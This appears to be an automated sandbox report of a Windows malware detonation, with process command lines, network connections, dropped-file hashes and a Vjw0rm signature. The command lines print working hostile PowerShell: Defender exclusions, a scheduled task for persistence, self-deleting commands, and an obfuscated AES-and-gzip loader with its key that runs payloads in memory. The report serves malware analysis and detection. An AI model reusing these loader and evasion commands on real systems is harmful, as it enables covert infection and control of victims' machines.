([Convert]::$AnzF($ouXIZ[1])));uLmzf $bJeLh $null;uLmzf $ViRjv $null;
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\3.bat'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2868);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '3.bat'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\3.bat'
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "3" /tr "C:\Users\Admin\AppData\Roaming\3.bat"
C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\3.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden -c #
C:\Users\Admin\AppData\Roaming\3.bat.exe
"C:\Users\Admin\AppData\Roaming\3.bat.exe" function fi($s){$s.Replace('PCgSe', '')}$TvSl=fi 'CPCgSehangPCgSeeExPCgSetenPCgSesiPCgSeoPCgSenPCgSe';$uPOI=fi 'CrPCgSeePCgSeaPCgSeteDPCgSeePCgSecrypPCgSetorPCgSe';$JkhJ=fi 'TraPCgSensPCgSefPCgSeormPCgSeFinaPCgSelBloPCgSecPCgSekPCgSe';$wwku=fi 'RePCgSeadLPCgSeinesPCgSe';$mfAv=fi 'GePCgSetPCgSeCPCgSeurrePCgSentPPCgSerocePCgSesPCgSesPCgSe';$LndS=fi 'FirPCgSestPCgSe';$IOON=fi 'LoaPCgSedPCgSe';$bGTU=fi 'EnPCgSetryPCgSePoPCgSeinPCgSetPCgSe';$VfMB=fi 'FroPCgSemBPCgSeasePCgSe6PCgSe4PCgSeStPCgSeriPCgSengPCgSe';$OqGp=fi 'InvPCgSeokPCgSeePCgSe';function zkztS($GNZBX){$cqmSn=[System.Security.Cryptography.Aes]::Create();$cqmSn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$cqmSn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$cqmSn.Key=[System.Convert]::$VfMB('UJReuXeqHSNd3qVXNxnQQ97OnOfSBItpzbPC/7v6/1s=');$cqmSn.IV=[System.Convert]::$VfMB('l+XIW/qwWmYbLeGbOZpElw==');$kDTzC=$cqmSn.$uPOI();$Eyxis=$kDTzC.$JkhJ($GNZBX,0,$GNZBX.Length);$kDTzC.Dispose();$cqmSn.Dispose();$Eyxis;}function JacSh($GNZBX){$BBOCs=New-Object System.IO.MemoryStream(,$GNZBX);$tgHik=New-Object System.IO.MemoryStream;$sqTvH=New-Object System.IO.Compression.GZipStream($BBOCs,[IO.Compression.CompressionMode]::Decompress);$sqTvH.CopyTo($tgHik);$sqTvH.Dispose();$BBOCs.Dispose();$tgHik.Dispose();$tgHik.ToArray();}function OVfya($GNZBX,$xwUmA){[System.Reflection.Assembly]::$IOON([byte[]]$GNZBX).$bGTU.$OqGp($null,$xwUmA);}$ImGss=[System.Linq.Enumerable]::$LndS([System.IO.File]::$wwku([System.IO.Path]::$TvSl([System.Diagnostics.Process]::$mfAv().MainModule.FileName, $null)));$MefbR = $ImGss.Substring(3).Split('\');$TlioL=JacSh (zkztS ([Convert]::$VfMB($MefbR[0])));$MTOPM=JacSh (zkztS ([Convert]::$VfMB($MefbR[1])));OVfya $MTOPM $null;OVfya $TlioL $null;
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2892);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\3')
C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\3.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden -c #
C:\Users\Admin\AppData\Roaming\3.bat.exe
"C:\Users\Admin\AppData\Roaming\3.bat.exe" function fi($s){$s.Replace('PCgSe', '')}$TvSl=fi 'CPCgSehangPCgSeeExPCgSetenPCgSesiPCgSeoPCgSenPCgSe';$uPOI=fi 'CrPCgSeePCgSeaPCgSeteDPCgSeePCgSecrypPCgSetorPCgSe';$JkhJ=fi 'TraPCgSensPCgSefPCgSeormPCgSeFinaPCgSelBloPCgSecPCgSekPCgSe';$wwku=fi 'RePCgSeadLPCgSeinesPCgSe';$mfAv=fi 'GePCgSetPCgSeCPCgSeurrePCgSentPPCgSerocePCgSesPCgSesPCgSe';$LndS=fi 'FirPCgSestPCgSe';$IOON=fi 'LoaPCgSedPCgSe';$bGTU=fi 'EnPCgSetryPCgSePoPCgSeinPCgSetPCgSe';$VfMB=fi 'FroPCgSemBPCgSeasePCgSe6PCgSe4PCgSeStPCgSeriPCgSengPCgSe';$OqGp=fi 'InvPCgSeokPCgSeePCgSe';function zkztS($GNZBX){$cqmSn=[System.Security.Cryptography.Aes]::Create();$cqmSn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$cqmSn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$cqmSn.Key=[System.Convert]::$VfMB('UJReuXeqHSNd3qVXNxnQQ97OnOfSBItpzbPC/7v6/1s=');$cqmSn.IV=[System.Convert]::$VfMB('l+XIW/qwWmYbLeGbOZpElw==');$kDTzC=$cqmSn.$uPOI();$Eyxis=$kDTzC.$JkhJ($GNZBX,0,$GNZBX.Length);$kDTzC.Dispose();$cqmSn.Dispose();$Eyxis;}function JacSh($GNZBX){$BBOCs=New-Object System.IO.MemoryStream(,$GNZBX);$tgHik=New-Object System.IO.MemoryStream;$sqTvH=New-Object System.IO.Compression.GZipStream($BBOCs,[IO.Compression.CompressionMode]::Decompress);$sqTvH.CopyTo($tgHik);$sqTvH.Dispose();$BBOCs.Dispose();$tgHik.Dispose();$tgHik.ToArray();}function OVfya($GNZBX,$xwUmA){[System.Reflection.Assembly]::$IOON([byte[]]$GNZBX).$bGTU.$OqGp($null,$xwUmA);}$ImGss=[System.Linq.Enumerable]::$LndS([System.IO.File]::$wwku([System.IO.Path]::$TvSl([System.Diagnostics.Process]::$mfAv().MainModule.FileName, $null)));$MefbR = $ImGss.Substring(3).Split('\');$TlioL=JacSh (zkztS ([Convert]::$VfMB($MefbR[0])));$MTOPM=JacSh (zkztS ([Convert]::$VfMB($MefbR[1])));OVfya $MTOPM $null;OVfya $TlioL $null;
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2276);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\3')
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 108.165.242.134:34097 | tcp | |
| US | 8.8.8.8:53 | 134.242.165.108.in-addr.arpa | udp |
| US | 52.152.108.96:443 | tcp | |
| US | 20.189.173.12:443 | tcp | |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 108.165.242.134:7000 | tcp | |
| US | 8.8.8.8:53 | 151.122.125.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.8.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.36.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.122.125.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.101.242.52.in-addr.arpa | udp |
| NL | 8.238.20.126:80 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| NL | 8.238.20.126:80 | tcp | |
| NL | 173.223.113.164:443 | tcp | |
| NL | 173.223.113.131:80 | tcp | |
| US | 131.253.33.203:80 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aofrzauk.fr4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2260-138-0x00000271F69B0000-0x00000271F69D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3.bat.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
memory/3256-149-0x00000000024D0000-0x0000000002506000-memory.dmp
memory/3256-150-0x0000000005070000-0x0000000005698000-memory.dmp
memory/3256-151-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/3256-152-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/3256-153-0x0000000004E20000-0x0000000004E42000-memory.dmp
memory/3256-154-0x0000000004EC0000-0x0000000004F26000-memory.dmp
memory/3256-155-0x0000000004FA0000-0x0000000005006000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a6c9d692ed2826ecb12c09356e69cc09 |
| SHA1 | def728a6138cf083d8a7c61337f3c9dade41a37f |
| SHA256 | a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b |
| SHA512 | 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3 |
memory/3256-166-0x0000000005DF0000-0x0000000005E0E000-memory.dmp
memory/3256-167-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/3256-168-0x00000000085D0000-0x0000000008C4A000-memory.dmp
memory/3256-169-0x0000000007F70000-0x0000000007F8A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3.bat.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
memory/2440-191-0x00000000024E0000-0x00000000024F0000-memory.dmp
memory/2440-190-0x00000000024E0000-0x00000000024F0000-memory.dmp
memory/460-192-0x00000000047D0000-0x00000000047E0000-memory.dmp
memory/2440-193-0x00000000024E0000-0x00000000024F0000-memory.dmp
memory/2440-194-0x0000000006390000-0x00000000063C2000-memory.dmp
memory/2440-195-0x0000000070BD0000-0x0000000070C1C000-memory.dmp
memory/2440-205-0x0000000006370000-0x000000000638E000-memory.dmp
memory/2440-206-0x0000000007150000-0x000000000715A000-memory.dmp
memory/3256-208-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/3256-207-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/2440-209-0x00000000073A0000-0x0000000007436000-memory.dmp
memory/3256-216-0x0000000008CF0000-0x0000000008D8C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 9751fcb3d8dc82d33d50eebe53abe314 |
| SHA1 | 7a680212700a5d9f3ca67c81e0e243834387c20c |
| SHA256 | ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7 |
| SHA512 | 54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709 |
C:\Users\Admin\AppData\Local\Temp\Media_SC.bat
| MD5 | 43d061a5271571b1907684432c97eb74 |
| SHA1 | 6fee1aa086d3120515c71ed065de5e9601d4f50d |
| SHA256 | b510310377730bd75296e15c8e2183dc21492bc0defdd564b46149642e0d381b |
| SHA512 | 292ae16078a3397dd45083281c73aef62890f92bb94529fd5fafe4b3459ad648845a4047cf2f813d53aa33f70e439371545446605f6092bfa207f75af66f22cb |
memory/3256-237-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/2364-238-0x0000000005180000-0x0000000005190000-memory.dmp
memory/4204-239-0x0000000002620000-0x0000000002630000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5fdbe7489d50f2bcb0a01845cbeda7e0 |
| SHA1 | 3da26b70ee939a548866dc670e977c1f27c59d8f |
| SHA256 | ad6c7552a03874e11b7b6d66055f672ae64a8052b81cf0f887e8647238f5b0d1 |
| SHA512 | 487f756d3e5c7dbd2d3c893de6e71cdc988326260153d341ae9fee9babb11074c311ebe39ad3e111041d0968ff7218ad6b22cb8302b6913e10841e6ea9730034 |
C:\Users\Admin\AppData\Local\Temp\Media_SC.bat.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
C:\Users\Admin\AppData\Local\Temp\Media_SC.bat.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ce3d315e9bfa2704e36f0bc5b026ad3e |
| SHA1 | 5e2f6d2d8d3c28a57cfc18f93db5092abe096361 |
| SHA256 | 84b7ce7c72fe4afa35c0987b47296ce989a7df3e7fb146f1e51e1032c7e79b27 |
| SHA512 | 9dfc68448e4765eb0ef5a6a5f733776ba5bc7b71bf35bbf09ecf46f4cae05d58f5a09f0d8c8de7c4026823dba6c8a5a4e8ddb1ed2dc3dcf50faad5dd4576a8de |
memory/2868-258-0x00000000027C0000-0x00000000027D0000-memory.dmp
memory/2868-256-0x00000000027C0000-0x00000000027D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 06ad34f9739c5159b4d92d702545bd49 |
| SHA1 | 9152a0d4f153f3f40f7e606be75f81b582ee0c17 |
| SHA256 | 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba |
| SHA512 | c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92 |
memory/460-269-0x00000000047D0000-0x00000000047E0000-memory.dmp
memory/460-270-0x00000000047D0000-0x00000000047E0000-memory.dmp
memory/2868-271-0x00000000027C0000-0x00000000027D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Media_SC.bat.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
memory/2868-280-0x00000000084A0000-0x0000000008AB8000-memory.dmp
memory/3900-279-0x0000000004BC0000-0x0000000004BD0000-memory.dmp
memory/2868-282-0x00000000075F0000-0x00000000076FA000-memory.dmp
memory/2868-287-0x0000000007530000-0x0000000007542000-memory.dmp
memory/3900-281-0x0000000004BC0000-0x0000000004BD0000-memory.dmp
memory/1372-288-0x0000000070BD0000-0x0000000070C1C000-memory.dmp
memory/2868-298-0x0000000007590000-0x00000000075CC000-memory.dmp
memory/1372-299-0x000000007F280000-0x000000007F290000-memory.dmp
memory/1372-300-0x0000000005010000-0x0000000005020000-memory.dmp
memory/1372-301-0x0000000007A30000-0x0000000007A3E000-memory.dmp
memory/1372-302-0x0000000007B30000-0x0000000007B4A000-memory.dmp
memory/1372-303-0x0000000007B20000-0x0000000007B28000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d1bd1607cb67de962df62188ffd6f6d9 |
| SHA1 | da394155d257f106d7981239dc1d3880f4dce20c |
| SHA256 | a416f082c3a5d64f8f8b04bf7d8108fbeb8d9e025551db01400cff6a0340146c |
| SHA512 | e4cb60b8a0273b53b84c87b0a35ed976f41e84aa8f3bb909ba54375d8532b844866ea5bda0655977d755963b0d102f06c3210a2e8c3a9d58ff26c9d7ef79f775 |
memory/2260-315-0x0000000002B90000-0x0000000002BA0000-memory.dmp
memory/2260-316-0x0000000002B90000-0x0000000002BA0000-memory.dmp
memory/2260-317-0x0000000070BD0000-0x0000000070C1C000-memory.dmp
memory/2364-327-0x0000000005180000-0x0000000005190000-memory.dmp
memory/2364-328-0x0000000005180000-0x0000000005190000-memory.dmp
memory/2260-329-0x0000000002B90000-0x0000000002BA0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7bd47afb9c9473bd7e0b760be5f30904 |
| SHA1 | e0a65964e900ffe7d8cb23f25e18dd438ebe2b91 |
| SHA256 | 4929449c62e248b246e99f61775c0cb4f7c7bcaf4718e4884eb185eb9f9604d5 |
| SHA512 | 01f8f074ecdd5b24d08a4aa8a4e904859b2d1a5b8c2eaee06ab20941bd9a6e70cd3f1d18f2edeab89b0ce9f9f64a1977bb0e922ccdbd69a7d99f42d125ead776 |
memory/2868-341-0x00000000027C0000-0x00000000027D0000-memory.dmp
memory/2868-342-0x00000000027C0000-0x00000000027D0000-memory.dmp
memory/2796-343-0x0000000004C10000-0x0000000004C20000-memory.dmp
memory/2796-344-0x0000000070BD0000-0x0000000070C1C000-memory.dmp
memory/2868-354-0x00000000027C0000-0x00000000027D0000-memory.dmp
memory/3900-355-0x0000000004BC0000-0x0000000004BD0000-memory.dmp
memory/2796-356-0x0000000004C10000-0x0000000004C20000-memory.dmp
memory/2868-357-0x0000000007F20000-0x0000000007FB2000-memory.dmp
memory/2868-358-0x0000000009070000-0x0000000009614000-memory.dmp
memory/3900-359-0x0000000004BC0000-0x0000000004BD0000-memory.dmp
memory/3256-368-0x0000000008CE0000-0x0000000008CEA000-memory.dmp
memory/3256-369-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/2868-370-0x00000000027C0000-0x00000000027D0000-memory.dmp
memory/2868-371-0x0000000008260000-0x00000000082D6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0a9e186cd6698ebc44861980a08cee80 |
| SHA1 | 8222d0600979a8796610dc2b6f4e759b7c7ab525 |
| SHA256 | a3ac80d9db761065823791a00203ba94309df4c1b2bbd2a629d85819721b53d0 |
| SHA512 | 0c7cc6a43bb2a944aafa32c93bab3804cb77aa47ed97296268736ad06310033f3ab1fc025a9614455d51b80fc8ff2d6ca33366290870179ae873e6f2b5cb255f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c2aad81c4b3539e15af05066c5fd49ac |
| SHA1 | b26338b8824c37f9fc1e41ab2ad90efb61fc61dd |
| SHA256 | 8de1ad1c04af25e735d58ffb6650187c47b12d35ded5a1fdd2cdfd8bc1fa4057 |
| SHA512 | 44a7e898c3e766f76973fad63ae5eb11808d5a86b0bc05a0805476466156155903a51a9c45e65030f191a787acf10bb3a5b22b48d46b91829202329a520adcde |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446e95627842d1440cba9d9022006793 |
| SHA1 | e79579cf2e5c95e4cf15ae4e3fb4cd246133adb8 |
| SHA256 | 903b4a20b87a2ce30cbd572d21b0dacdb6cab7f82598254ca0c04319ca9acd8f |
| SHA512 | 176c9c63e780946a7dcd3406457344888b2c08aff8082ccd8d72998d878b2a8149f87f40d831959fba6ab7aa1de7a0f7304f9a4d858f054a41e0b2229a210916 |
C:\Users\Admin\AppData\Roaming\3.bat
| MD5 | 476d87590230e420d07a4d6fd677bd1d |
| SHA1 | 29a2c881b58dd4d9ea40c2208952fdc39627265d |
| SHA256 | b6ee5ced40c6a82853e8b5543e139254b0aa9c503b670943818b332297293dd2 |
| SHA512 | f2bad15633d8f8801eeb0843c9b7462480b8927014db4a0adc05f631a19039e6b15e63265d19eb624979b762fd1640435acffd65d34dd2b9ef219a0c7126edbc |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446e95627842d1440cba9d9022006793 |
| SHA1 | e79579cf2e5c95e4cf15ae4e3fb4cd246133adb8 |
| SHA256 | 903b4a20b87a2ce30cbd572d21b0dacdb6cab7f82598254ca0c04319ca9acd8f |
| SHA512 | 176c9c63e780946a7dcd3406457344888b2c08aff8082ccd8d72998d878b2a8149f87f40d831959fba6ab7aa1de7a0f7304f9a4d858f054a41e0b2229a210916 |
C:\Users\Admin\AppData\Roaming\3.bat.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 13af6be1cb30e2fb779ea728ee0a6d67 |
| SHA1 | f33581ac2c60b1f02c978d14dc220dce57cc9562 |
| SHA256 | 168561fb18f8eba8043fa9fc4b8a95b628f2cf5584e5a3b96c9ebaf6dd740e3f |
| SHA512 | 1159e1087bc7f7cbb233540b61f1bdecb161ff6c65ad1efc9911e87b8e4b2e5f8c2af56d67b33bc1f6836106d3fea8c750cc24b9f451acf85661e0715b829413 |
C:\Users\Admin\AppData\Roaming\3.bat.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fe088ad32f99112ad8e47f58c54a2c01 |
| SHA1 | b2aa6264f5b3ff8a2b4f37579d03fa85180abc7b |
| SHA256 | ed155cbe1dd593853f6cd10a1f21bd7b6df77b84fd232f58f36c0854e81f09f7 |
| SHA512 | 07096ee378d7b83a4971ee98b3fab40fc1909e379369c602f1685e86089fa06460d9457f5f30ca3186c3bc78cf0897f0e8938d5d8a46412c5b032b97ceedec43 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 49035b665ec6473af460534b7c28ac5e |
| SHA1 | ccba38d075ab2151af5fe5cbc052c5474947c822 |
| SHA256 | da0c52a3a2165dec846107ccbf80b39750099055dfe84f6da82ec150f0f81d57 |
| SHA512 | 88e37f4b8c242e9506965b4dd5064589e2dcc4fb4e23cd28d1beea6d92eee3fb1e03e4478181ba5dbccaccd5a636b94c9fcb1949f452f3240e06118b72bba06e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 49035b665ec6473af460534b7c28ac5e |
| SHA1 | ccba38d075ab2151af5fe5cbc052c5474947c822 |
| SHA256 | da0c52a3a2165dec846107ccbf80b39750099055dfe84f6da82ec150f0f81d57 |
| SHA512 | 88e37f4b8c242e9506965b4dd5064589e2dcc4fb4e23cd28d1beea6d92eee3fb1e03e4478181ba5dbccaccd5a636b94c9fcb1949f452f3240e06118b72bba06e |
C:\Users\Admin\AppData\Roaming\3.bat.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3.bat.exe.log
| MD5 | 545145bd63005959b3571fc66154db56 |
| SHA1 | 4d5b872ba37cd364b24b9feff3a5649eae4cb6e7 |
| SHA256 | fd899e50134789747d3aa854a12f5f026bab6d3421eb8103b51843c999d4a57d |
| SHA512 | de5416f989b7bf525997b984b14ff0265f941be01925d03d753ec04207df3a97bc09f5516c2f19be2dc30704591bfc7d87d0b0e45cf3f3401ffd89c47d728e8c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 13af6be1cb30e2fb779ea728ee0a6d67 |
| SHA1 | f33581ac2c60b1f02c978d14dc220dce57cc9562 |
| SHA256 | 168561fb18f8eba8043fa9fc4b8a95b628f2cf5584e5a3b96c9ebaf6dd740e3f |
| SHA512 | 1159e1087bc7f7cbb233540b61f1bdecb161ff6c65ad1efc9911e87b8e4b2e5f8c2af56d67b33bc1f6836106d3fea8c750cc24b9f451acf85661e0715b829413 |
C:\Users\Admin\AppData\Roaming\3.bat.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
Analysis: behavioral1
Detonation Overview
Submitted
2023-03-29 11:10
Reported
2023-03-29 11:13
Platform
win7-20230220-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Vjw0rm
Blocklisted process makes network request
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xQgwkAjhRq.js | C:\Windows\System32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xQgwkAjhRq.js | C:\Windows\System32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.js | C:\Windows\System32\wscript.exe | N/A |
